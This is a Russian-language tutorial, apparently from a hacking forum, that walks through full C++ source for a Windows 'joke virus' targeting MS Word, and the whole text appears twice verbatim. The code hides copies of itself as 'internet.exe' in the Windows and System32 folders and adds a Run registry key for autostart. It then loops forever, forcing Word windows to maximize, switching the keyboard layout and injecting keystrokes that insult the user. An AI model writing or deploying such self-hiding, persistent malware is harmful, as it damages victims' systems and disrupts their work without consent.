Еще один исходник вируса на C++. Шутка с MS Word. Сейчас по шагам распишем, как устроен этот шутник.
Подключаем библиотеки и создаем основные переменные.
Код:
#include <windows.h>
#include <iostream.h>
WINAPI WinMain(HINSTANCE hint, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
HKEY key;
char sysdir[256],
windir[256],
myname[256];
Узнаем свое имя функцией GetModuleFileName. И узнает адрес папки windows и папки system32 функциями GetWindowsDirectoryиGetSystemDirectory
Код:
GetModuleFileName(hint,myname,256);
GetWindowsDirectory(windir,sizeof(windir));
GetSystemDirectory(sysdir,sizeof(sysdir));
Добавляем к строкам содержащим пути к системным папкам имя нашего вируса, чтобы скопировать в эти папки себя.
Код:
strcat(windir,"\\internet.exe");
strcat(sysdir,"\\internet.exe");
Копируемся и ставим себе скрытые атрибуты
Код:
CopyFile(myname,windir,FALSE);
CopyFile(myname,sysdir,FALSE);
SetFileAttributes(windir,FILE_ATTRIBUTE_HIDDEN);
SetFileAttributes(sysdir,FILE_ATTRIBUTE_HIDDEN);
Прописываемся в реестр на автозагрузку
Код:
RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0,KEY_WRITE, &key);
RegSetValueEx(key,"internet.exe",0,REG_SZ,(BYTE *)sysdir,256);
RegCloseKey(key);
Ожидаем 2 минуты. Зачем не знаю
Sleep(60000*2); //Две минуты
Запускаем бесконечный цикл каждые 10 секунд. В цикле ищем окна содержащие в своих заголовках Microsoft Word, Microsoft Excel,Microsoft PowerPoint. Максимизируем окно, переключаем раскладку клавиатуры на русскую и эмулируем нажатие на несколько клавиш. В результате в окне пользователя в WORD сам по себе печатается текст "Вы ламер".
Код:
int k=0;
do
{
if (FindWindow(NULL, "Microsoft Word")!=0 || FindWindow(NULL, "Microsoft Excel")!=0 || FindWindow(NULL, "Microsoft PowerPoint")!=0)
{
ShowWindow(FindWindow(NULL, "Microsoft Word") , SC_MAXIMIZE);
LoadKeyboardLayout("00000419", KLF_ACTIVATE);
Sleep(10000);
do
{
keybd_event('D', 0,0,0);
keybd_event('D', 0,KEYEVENTF_KEYUP,0);
keybd_event('S', 0,0,0);
keybd_event('S', 0,KEYEVENTF_KEYUP,0);
keybd_event(VK_SPACE, 0,0,0);
keybd_event(VK_SPACE, 0,KEYEVENTF_KEYUP,0);
keybd_event('K', 0,0,0);
keybd_event('K', 0,KEYEVENTF_KEYUP,0);
keybd_event('F', 0,0,0);
keybd_event('F', 0,KEYEVENTF_KEYUP,0);
keybd_event('V', 0,0,0);
keybd_event('V', 0,KEYEVENTF_KEYUP,0);
keybd_event('T', 0,0,0);
keybd_event('T', 0,KEYEVENTF_KEYUP,0);
keybd_event('H', 0,0,0);
keybd_event('H', 0,KEYEVENTF_KEYUP,0);
}while(1);
}
}while(1);
}
Вот и весь вирус-шутник.
Подключаем библиотеки и создаем основные переменные.
Код:
#include <windows.h>
#include <iostream.h>
WINAPI WinMain(HINSTANCE hint, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
HKEY key;
char sysdir[256],
windir[256],
myname[256];
Узнаем свое имя функцией GetModuleFileName. И узнает адрес папки windows и папки system32 функциями GetWindowsDirectoryиGetSystemDirectory
Код:
GetModuleFileName(hint,myname,256);
GetWindowsDirectory(windir,sizeof(windir));
GetSystemDirectory(sysdir,sizeof(sysdir));
Добавляем к строкам содержащим пути к системным папкам имя нашего вируса, чтобы скопировать в эти папки себя.
Код:
strcat(windir,"\\internet.exe");
strcat(sysdir,"\\internet.exe");
Копируемся и ставим себе скрытые атрибуты
Код:
CopyFile(myname,windir,FALSE);
CopyFile(myname,sysdir,FALSE);
SetFileAttributes(windir,FILE_ATTRIBUTE_HIDDEN);
SetFileAttributes(sysdir,FILE_ATTRIBUTE_HIDDEN);
Прописываемся в реестр на автозагрузку
Код:
RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0,KEY_WRITE, &key);
RegSetValueEx(key,"internet.exe",0,REG_SZ,(BYTE *)sysdir,256);
RegCloseKey(key);
Ожидаем 2 минуты. Зачем не знаю
Sleep(60000*2); //Две минуты
Запускаем бесконечный цикл каждые 10 секунд. В цикле ищем окна содержащие в своих заголовках Microsoft Word, Microsoft Excel,Microsoft PowerPoint. Максимизируем окно, переключаем раскладку клавиатуры на русскую и эмулируем нажатие на несколько клавиш. В результате в окне пользователя в WORD сам по себе печатается текст "Вы ламер".
Код:
int k=0;
do
{
if (FindWindow(NULL, "Microsoft Word")!=0 || FindWindow(NULL, "Microsoft Excel")!=0 || FindWindow(NULL, "Microsoft PowerPoint")!=0)
{
ShowWindow(FindWindow(NULL, "Microsoft Word") , SC_MAXIMIZE);
LoadKeyboardLayout("00000419", KLF_ACTIVATE);
Sleep(10000);
do
{
keybd_event('D', 0,0,0);
keybd_event('D', 0,KEYEVENTF_KEYUP,0);
keybd_event('S', 0,0,0);
keybd_event('S', 0,KEYEVENTF_KEYUP,0);
keybd_event(VK_SPACE, 0,0,0);
keybd_event(VK_SPACE, 0,KEYEVENTF_KEYUP,0);
keybd_event('K', 0,0,0);
keybd_event('K', 0,KEYEVENTF_KEYUP,0);
keybd_event('F', 0,0,0);
keybd_event('F', 0,KEYEVENTF_KEYUP,0);
keybd_event('V', 0,0,0);
keybd_event('V', 0,KEYEVENTF_KEYUP,0);
keybd_event('T', 0,0,0);
keybd_event('T', 0,KEYEVENTF_KEYUP,0);
keybd_event('H', 0,0,0);
keybd_event('H', 0,KEYEVENTF_KEYUP,0);
}while(1);
}
}while(1);
}
Вот и весь вирус-шутник.